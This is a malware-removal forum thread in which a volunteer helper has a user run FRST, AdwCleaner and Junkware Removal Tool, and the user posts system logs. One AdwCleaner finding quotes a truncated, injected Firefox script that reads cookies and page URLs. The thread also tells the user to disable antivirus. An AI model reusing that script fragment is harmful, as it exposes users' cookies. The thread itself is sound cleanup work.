2014-12-10 11:28 - 2014-11-21 19:40 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-12-10 11:28 - 2014-11-21 19:36 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-12-10 11:28 - 2014-11-21 19:35 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-12-10 11:28 - 2014-11-21 19:33 - 00285696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-12-10 11:28 - 2014-11-21 19:29 - 04299264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-12-10 11:28 - 2014-11-21 19:28 - 02358272 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-12-10 11:28 - 2014-11-21 19:23 - 00688640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-12-10 11:28 - 2014-11-21 19:22 - 02052096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-12-10 11:28 - 2014-11-21 19:21 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-12-10 11:28 - 2014-11-21 19:15 - 01548288 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-12-10 11:28 - 2014-11-21 19:13 - 12836864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-12-10 11:28 - 2014-11-21 19:03 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-12-10 11:28 - 2014-11-21 19:00 - 01888256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-12-10 11:28 - 2014-11-21 18:56 - 01307136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-12-10 11:28 - 2014-11-21 18:54 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-12-10 11:28 - 2014-11-10 21:09 - 01424384 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2014-12-10 11:28 - 2014-11-10 20:44 - 01230336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WindowsCodecs.dll
2014-12-10 11:28 - 2014-11-10 19:46 - 00119296 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tdx.sys
2014-12-10 11:25 - 2014-11-07 21:16 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-12-10 11:25 - 2014-11-07 20:45 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2014-12-10 11:25 - 2014-10-29 20:03 - 00165888 _____ (Microsoft Corporation) C:\Windows\system32\charmap.exe
2014-12-10 11:25 - 2014-10-29 19:45 - 00155136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\charmap.exe
2014-12-10 11:25 - 2014-10-02 20:12 - 02020352 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll
2014-12-10 11:25 - 2014-10-02 20:12 - 00346624 _____ (Microsoft Corporation) C:\Windows\system32\WSManMigrationPlugin.dll
2014-12-10 11:25 - 2014-10-02 20:12 - 00310272 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll
2014-12-10 11:25 - 2014-10-02 20:12 - 00181248 _____ (Microsoft Corporation) C:\Windows\system32\WsmAuto.dll
2014-12-10 11:25 - 2014-10-02 20:11 - 00266240 _____ (Microsoft Corporation) C:\Windows\system32\WSManHTTPConfig.exe
2014-12-10 11:25 - 2014-10-02 19:45 - 01177088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll
2014-12-10 11:25 - 2014-10-02 19:45 - 00248832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManMigrationPlugin.dll
2014-12-10 11:25 - 2014-10-02 19:45 - 00214016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll
2014-12-10 11:25 - 2014-10-02 19:45 - 00145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmAuto.dll
2014-12-10 11:25 - 2014-10-02 19:44 - 00198656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManHTTPConfig.exe

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-01-09 16:27 - 2013-11-24 01:27 - 00000000 ____D () C:\Program Files (x86)\Dell Backup and Recovery
2015-01-09 16:25 - 2014-01-15 20:28 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-01-09 16:24 - 2009-07-13 23:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2015-01-09 16:20 - 2014-01-15 20:28 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-01-09 16:11 - 2009-07-13 22:45 - 00021296 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-01-09 16:11 - 2009-07-13 22:45 - 00021296 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-01-08 23:56 - 2013-11-24 01:09 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-01-08 23:20 - 2013-11-24 02:59 - 02033357 _____ () C:\Windows\WindowsUpdate.log
2015-01-08 22:29 - 2014-01-13 15:32 - 00003440 _____ () C:\Windows\System32\Tasks\PCDEventLauncherTask
2015-01-07 12:38 - 2014-09-22 14:03 - 00000000 ____D () C:\Windows\Minidump
2015-01-05 11:39 - 2014-01-15 20:28 - 00000000 ____D () C:\Program Files (x86)\Google
2014-12-26 12:41 - 2014-01-13 15:41 - 00001945 _____ () C:\Windows\epplauncher.mif
2014-12-26 11:28 - 2011-02-10 08:02 - 00000000 ____D () C:\Windows\panther
2014-12-26 11:11 - 2013-11-24 01:33 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2014-12-26 11:04 - 2014-05-17 17:40 - 31215616 _____ () C:\Windows\system32\config\components.iodefrag.bak
2014-12-26 11:04 - 2014-04-24 09:03 - 74121216 _____ () C:\Windows\system32\config\SOFTWARE.iodefrag.bak
2014-12-26 11:04 - 2014-04-24 09:03 - 00323584 _____ () C:\Windows\system32\config\DEFAULT.iodefrag.bak
2014-12-26 11:04 - 2014-04-24 09:03 - 00061440 _____ () C:\Windows\system32\config\SAM.iodefrag.bak
2014-12-26 11:04 - 2014-04-24 09:03 - 00024576 _____ () C:\Windows\system32\config\SECURITY.iodefrag.bak
2014-12-26 11:04 - 2014-01-13 15:25 - 00000000 ____D () C:\Users\John
2014-12-26 11:02 - 2013-11-24 01:09 - 00701616 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-12-26 11:02 - 2013-11-24 01:09 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-12-26 11:02 - 2013-11-24 01:09 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-12-26 11:01 - 2009-07-13 23:13 - 00783606 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-12-26 10:59 - 2013-11-24 02:27 - 00107552 _____ (Realtek Semiconductor Corporation) C:\Windows\system32\RTNUninst64.dll
2014-12-26 10:58 - 2014-01-13 15:34 - 00000000 ____D () C:\Users\John\Documents\Bluetooth Folder
2014-12-19 13:10 - 2014-01-13 15:58 - 00000000 ____D () C:\Users\John\AppData\Roaming\Mozilla
2014-12-17 20:11 - 2009-07-13 23:32 - 00000000 ____D () C:\Windows\Offline Web Pages
2014-12-17 20:10 - 2014-02-09 22:33 - 00000000 ____D () C:\Users\John\AppData\Roaming\systweak
2014-12-16 16:03 - 2014-01-13 16:48 - 00000000 ____D () C:\Users\John\AppData\Roaming\Skype
2014-12-16 16:03 - 2013-11-24 01:22 - 00000000 ____D () C:\ProgramData\Skype
2014-12-16 12:12 - 2014-01-15 21:13 - 00000000 ____D () C:\Users\John\AppData\Local\CrashDumps
2014-12-16 11:52 - 2014-01-13 15:32 - 00000000 ____D () C:\Users\John\AppData\Local\VirtualStore
2014-12-14 03:23 - 2013-11-24 01:22 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2014-12-11 03:22 - 2009-07-13 21:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2014-12-11 03:07 - 2014-01-19 21:27 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-12-11 03:06 - 2014-01-17 17:34 - 00000000 ____D () C:\Windows\system32\MRT
2014-12-11 03:03 - 2014-01-17 17:34 - 112710672 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-01-06 10:29

==================== End Of Log ============================

 


  • 0

#12
Nevan

Nevan

    Trusted Helper

  • Malware Removal
  • 1,765 posts
Hello, snoopdog1951.

Everything looks a lot better now. Could you please tell me if you still have any issues with your computer?

And also, please, do the following:

 
Step #1
FRST Fix
  • Download attached fixlist.txt file to your desktop.
    Attached File  fixlist.txt   219bytes   94 downloads
    NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system
  • Right click FRST64.exe on your desktop and click Run as administrator. When the tool opens click Yes to disclaimer.
  • Press the Fix button just once and wait.
    NOTE: It's important that both FRST64.exe and fixlist.txt are in the same location or the fix will not work.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished, FRST will generate a log on the desktop (Fixlog.txt). Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply.
 
Step #2
AdwCleaner
  • Download AdwCleaner to your Desktop.
  • Close any open windows
  • Disable your Antivirus program (click here if you don't know how to do this)
  • Double click AdwCleaner.exe on your desktop to run it
  • Click the OvD9RYN.png button
  • Wait for AdwCleaner to finish the scan
  • When the scan is finished, there will be "Pending. Please uncheck elements you don't want to remove" message. Leave everything as it is and click qKMbAXQ.png button. A Notepad window will be opened
  • Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply.
Remember to enable your Antivirus program once you're done!

 
Things that should appear in your next post:
  • Fixlog.txt log content
  • AdwCleaner log content
  • Please tell me if you still have any issues with your computer

  • 0

#13
snoopdog1951

snoopdog1951

    Member

  • Topic Starter
  • Member
  • PipPip
  • 17 posts

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 07-01-2015
Ran by John at 2015-01-10 16:05:54 Run:3
Running from C:\Users\John\Desktop
Loaded Profile: John (Available profiles: John)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
CreateRestorePoint:
CHR Extension: (Free Visio Viewer) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcpmofnlkemfkhgngcdppgbhncoflmpe [2014-12-16]
cmd: bitsadmin /reset /allusers
EmptyTemp:
*****************

Restore point was successfully created.
C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcpmofnlkemfkhgngcdppgbhncoflmpe directory not found.

=========  bitsadmin /reset /allusers =========


BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
© Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

0 out of 0 jobs canceled.

========= End of CMD: =========

EmptyTemp: => Removed 125.1 MB temporary data.


The system needed a reboot.

==== End of Fixlog 16:06:22 ====

 

Note:  Firefox seems to be getting sluggish. Alot of "not responding" then after a bit it takes off.Step 2 coming


  • 0

#14
snoopdog1951

snoopdog1951

    Member

  • Topic Starter
  • Member
  • PipPip
  • 17 posts

# AdwCleaner v4.107 - Report created 10/01/2015 at 17:18:20
# Updated 07/01/2015 by Xplode
# Database : 2015-01-03.1 [Live]
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : John - JOHN-PC
# Running from : C:\Users\John\Desktop\AdwCleaner.exe
# Option : Scan

***** [ Services ] *****


***** [ Files / Folders ] *****

File Found : C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_static.re-markable00.re-markable.net_0.localstorage
Folder Found : C:\Users\John\AppData\Roaming\0D0S1L2Z1P1B0T1P1B2Z
Folder Found : C:\Users\John\AppData\Roaming\DigitalSites
Folder Found : C:\Users\John\AppData\Roaming\Slick Savings
Folder Found : C:\Users\John\AppData\Roaming\Systweak

***** [ Scheduled Tasks ] *****


***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Found : HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
Key Found : HKCU\Software\AppDataLow\Software\adawarebp
Key Found : HKCU\Software\systweak
Key Found : [x64] HKCU\Software\systweak
Key Found : HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
Key Found : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Found : HKLM\SOFTWARE\Classes\AppID\{C292AD0A-C11F-479B-B8DB-743E72D283B0}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{459DD0F7-0D55-D3DC-67BC-E6BE37E9D762}
Key Found : HKLM\SOFTWARE\systweak
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\30C16B15B255BD349A1157B8A83E2AF9
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\ED1CAE30F47D14B41B5FC8FA53658044

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17496


-\\ Mozilla Firefox v34.0.5 (x86 en-US)

[zfddampy.default-1396900832420] - Line Found : user_pref("extensions.24mMJZqMtuIrRRSO.scode", "try{(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.index[...]

-\\ Google Chrome v

[C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Web data] - Found [Search Provider] : hxxp://isearch.avg.com/search?cid={6B482713-6B0E-4D94-A9E4-1CB994F08348}&mid=cf1a55a4b03b47d3b779d15c832bb46e-1773fe8c3c9d59846c96076deaa1e0e071fccab1&ds=AVG&lang=en&v=11.0.0.9&pr=pr&d=&sap=dsp&q={searchTerms}
[C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Web data] - Found [Search Provider] : hxxp://websearch.ask.com/redirect?client=cr&src=kw&tb=ORJ&o=&locale=&apn_uid=40E1C5C8-E8DE-4A82-B4C4-FE9EF0E2DAB3&apn_ptnrs=TV&apn_sauid=AE22BD18-6B8F-45BC-8FD6-9C948D701914&apn_dtid=OSJ000YYUS&q={searchTerms}
[C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Web data] - Found [Search Provider] : hxxp://websearch.ask.com/redirect?client=cr&src=kw&tb=ORJ&o=&locale=&apn_uid=40E1C5C8-E8DE-4A82-B4C4-FE9EF0E2DAB3&apn_ptnrs=TV&apn_sauid=AE22BD18-6B8F-45BC-8FD6-9C948D701914&apn_dtid=OSJ000YYUS&q={searchTerms}
[C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Web data] - Found [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
[C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Web data] - Found [Search Provider] : hxxp://search.aol.com/aol/search?q={searchTerms}
[C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Web data] - Found [Search Provider] : hxxp://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=dsites0103&cd=2XzuyEtN2Y1L1QzuyByEzzyCyB0AyD0ByDyEzyzytDtByC0FtN0D0Tzu0CyByBtCtN1L2XzutBtFtBtFtCyDtFtCyCtAtCtN1L1CzutBtAtDtC1N1R&cr=20185727&ir=

*************************

AdwCleaner[R0].txt - [3608 octets] - [10/01/2015 17:18:20]

########## EOF - C:\AdwCleaner\AdwCleaner[R0].txt - [3668 octets] ##########
Again pc is running slow , seems to be firefox.


  • 0

#15
Nevan

Nevan

    Trusted Helper

  • Malware Removal
  • 1,765 posts
Hello, snoopdog1951.

We'll look onto the Firefox problem later.

Let's move forward.

 
Step #1
Junkware Removal Tool
  • Download Junkware Removal Tool to your Desktop
  • Close any open windows
  • Disable your Antivirus program
  • Double click JRT.exe on your desktop to run it
  • Click any button to start the scan
  • Wait for Junkware Removal Tool to finish the scan
  • When the scan is finished, JRT.txt will be saved to your desktop and it will automatically open
  • Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply.
 
Step #2
AdwCleaner
  • Close any open windows
  • Double click AdwCleaner.exe on your desktop to run it
  • Click the OvD9RYN.png button
  • Wait for AdwCleaner to finish the scan
  • When the scan is finished, there will be "Pending. Please uncheck elements you don't want to remove" message. Leave everything as it is and click p2tBmrU.png button.
  • When the cleaning is finished, the program will ask you to reboot the system. Please do so.
  • Once your machine has rebooted, a Notepad window will be opened. If it won't, you can find it in C:\AdwCleaner. The report will be saved as AdwCleaner[S0].txt.
  • Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply.
Remember to enable your Antivirus program once you're done!

 
Step #3
FRST Scan
  • Right click FRST64.exe and click Run as administrator. When the tool opens click Yes to disclaimer.
  • Make sure that Addition.txt is checked and press the Scan button.
  • It will produce two logs - one called FRST.txt and another one called Addition.txt in the same directory the tool is run from.
  • Select all (CTRL+A) the content of the logs, copy them (CTRL+C) and paste (CTRL+V) them into your next reply.
 
Things that should appear in your next post:
  • JRT.txt log content
  • AdwCleaner[S0].txt log content
  • FRST.txt log content
  • Addition.txt log content

  • 0






Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP